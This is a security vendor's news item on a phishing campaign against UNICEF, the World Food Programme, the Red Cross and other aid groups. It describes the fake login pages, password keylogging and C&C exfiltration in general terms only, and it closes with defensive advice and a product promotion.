Threat actors launched phishing attempts against several humanitarian and non-governmental organizations, including several of the aid arms of the United Nations, such as the United Nations Children's Fund (UNICEF) and the UN World Food Programme, as well as other notable groups like the International Federation of Red Cross and Red Crescent Societies. Lookout researchers revealed the existence of the phishing attacks.
The campaign has apparently been active since March 2019, with the two domains used to host the malware variants being associated with an IP network block and an ASN (Autonomous System Number) that were found to have also previously hosted malware.
The phishing pages used by the threat actors include code that detects if the user visiting the site is using a mobile device, in which case mobile-specific content is displayed. Keylogging functionality was also found in the password field, allowing the threat actors to retrieve passwords even if visitors to the site do not actually complete the login process. The password, along with the user email, is then sent to a command-and-control (C&C) server.
To make the attacks more convincing, users are redirected to legitimate-looking PDFs and other types of documents once they enter their credentials on the fake login pages. The fake pages also employ SSL certificates, with six of these still valid until November — an indication that, according to Lookout, the campaign might still be ongoing.
Credential phishing itself is still being widely used, according to our accounting for 40% of the total high-risk email threats of 2018 detected by Trend Micro Cloud App Security – with attacks involving Microsoft Office 365 (which was used as login pages for this incident) on the rise.
Social engineering can take many forms — many of which need only a working knowledge of how people think and act. These kinds of scams can prove extremely lucrative for threat actors — hence their popularity. The following best practices can help organizations protect themselves from social engineering attacks:
To bolster their security capabilities and further protect their end users, organizations can consider security products such as the Trend Micro™ Cloud App Security™ solution, which uses machine learning (ML) to help detect and block phishing attempts. If a suspected phishing email is received by an employee, it will go through sender, content, and URL reputation analysis, which is followed by an inspection of the remaining URLs using computer vision and AI to check if website components are being spoofed. The solution can also detect suspicious content in the message body and attachments, and provide sandbox malware analysis and document exploit detection.
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.